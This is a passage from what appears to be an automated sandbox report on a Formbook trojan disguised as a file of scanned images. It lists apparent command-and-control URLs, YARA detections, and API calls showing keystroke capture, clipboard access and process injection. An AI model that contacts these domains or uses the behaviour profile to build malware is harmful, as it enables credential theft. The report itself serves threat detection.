charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 18 Aug 2024 16:26:30 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000036E8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://lecoinsa.net/7ffx/?dZo=bNQ0/ONSUiz8Cvet9WekHsY6glAUeAndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbr
            Source: XraVxjqYYo.exe, 0000000A.00000002.3811962670.0000000005491000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.lfghtko.lol
            Source: XraVxjqYYo.exe, 0000000A.00000002.3811962670.0000000005491000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.lfghtko.lol/yxos/
            Source: schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: XraVxjqYYo.exe, 0000000A.00000002.3810037675.0000000003A0C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://dhosting.pl
            Source: schtasks.exe, 00000009.00000002.3811492832.0000000003EDC000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.0000000003A0C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://dhosting.pl/bledyhttp/domeny.html
            Source: schtasks.exe, 00000009.00000002.3811492832.0000000003EDC000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.0000000003A0C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://dhosting.pl/bledyhttp/hosting.html
            Source: schtasks.exe, 00000009.00000002.3811492832.0000000003EDC000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.0000000003A0C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://dhosting.pl/img/logo.svg
            Source: XraVxjqYYo.exe, 0000000A.00000002.3810037675.0000000003A0C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://dhosting.pl/kontakt
            Source: schtasks.exe, 00000009.00000002.3813151529.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3811492832.00000000046B6000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000041E6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
            Source: schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: schtasks.exe, 00000009.00000002.3811492832.00000000046B6000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000041E6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
            Source: schtasks.exe, 00000009.00000002.3813151529.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3811492832.00000000046B6000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000041E6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
            Source: schtasks.exe, 00000009.00000002.3811492832.00000000046B6000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000041E6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
            Source: schtasks.exe, 00000009.00000002.3813151529.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3811492832.00000000046B6000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000041E6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://hm.baidu.com/hm.js?
            Source: schtasks.exe, 00000009.00000002.3813151529.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3811492832.00000000046B6000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000041E6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
            Source: schtasks.exe, 00000009.00000002.3813151529.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3811492832.00000000046B6000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000041E6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
            Source: schtasks.exe, 00000009.00000002.3801096520.0000000002901000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: schtasks.exe, 00000009.00000002.3801096520.000000000292C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: schtasks.exe, 00000009.00000003.1804842612.0000000007632000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: schtasks.exe, 00000009.00000002.3801096520.0000000002901000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: schtasks.exe, 00000009.00000002.3801096520.0000000002901000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: schtasks.exe, 00000009.00000002.3801096520.0000000002901000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: schtasks.exe, 00000009.00000002.3801096520.000000000292C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: schtasks.exe, 00000009.00000002.3813151529.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3811492832.00000000046B6000.00000004.10000000.00040000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000041E6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://track.uc.cn/collect
            Source: schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A9425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00A9425A
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A94458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00A94458
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A80219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00A80219
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00AACDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00AACDAC

            E-Banking Fraud

            Source: Yara match | File source: 2.2.svchost.exe.2120000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.2120000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000002.00000002.1624858968.0000000002120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.3809994652.0000000002A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1625612818.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.3811962670.0000000005410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.3809765058.00000000030F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1625179434.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.3798026711.00000000026B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.3809886003.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.2120000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.2120000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1624858968.0000000002120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3809994652.0000000002A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1625612818.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.3811962670.0000000005410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3809765058.00000000030F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1625179434.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3798026711.00000000026B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3809886003.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: This is a third-party compiled AutoIt script.0_2_00A23B4C
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, 00000000.00000000.1317050979.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_2b2a3461-1
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, 00000000.00000000.1317050979.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_73664728-8
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a5cb8ffd-e
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_868f469c-9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0214B293 NtClose
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D72B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D72DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D735C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D74340 NtSetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D74650 NtSuspendThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D72AD0 NtReadFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D72AF0 NtWriteFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D72AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D72BF0 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D72BE0 NtQueryValueKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D72B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D72BA0 NtEnumerateValueKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D72EE0 NtQueueApcThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D72E80 NtReadVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D72EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D72E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D72FE0 NtCreateFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D72F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D72FB0 NtResumeThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D72FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D72F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D72F30 NtCreateSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D72CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D72CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D72CA0 NtQueryInformationToken
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D72C70 NtFreeVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D72C60 NtCreateKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D72C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D72DD0 NtDelayExecution
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D72DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D72D10 NtMapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D72D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D72D30 NtUnmapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D73090 NtSetValueKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D73010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D739B0 NtGetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D73D70 NtOpenThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D73D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF4340 NtSetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF4650 NtSuspendThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF2AF0 NtWriteFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF2AD0 NtReadFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF2B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF2EE0 NtQueueApcThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF2FE0 NtCreateFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF2FB0 NtResumeThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF2F30 NtCreateSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF2CA0 NtQueryInformationToken,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF2C60 NtCreateKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF2C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF2DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF2DD0 NtDelayExecution,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF2D30 NtUnmapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF2D10 NtMapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF35C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF39B0 NtGetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF2AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF2BE0 NtQueryValueKey
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF2BF0 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF2BA0 NtEnumerateValueKey
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF2B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF2EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF2E80 NtReadVirtualMemory
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF2E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF2FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF2F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF2F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF2CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF2CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF2C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF2DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF2D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF3090 NtSetValueKey
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF3010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF3D70 NtOpenThread
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_02EF3D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_026D7AA0 NtReadFile
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_026D7B90 NtDeleteFile
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_026D7940 NtCreateFile
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_026D7C30 NtClose
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A840B1: CreateFileW,_memset,DeviceIoControl,CloseHandle
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A78858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A8545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A2E800
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A4DBB5
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A2E060
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00AA804A
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A34140
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A42405
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A56522
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00AA0665
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A5267E
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A4283A
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A36843
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A589DF
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A56A94
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00AA0AE2
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A38A0E
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A7EB07
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A88B13
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A4CD61
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A57006
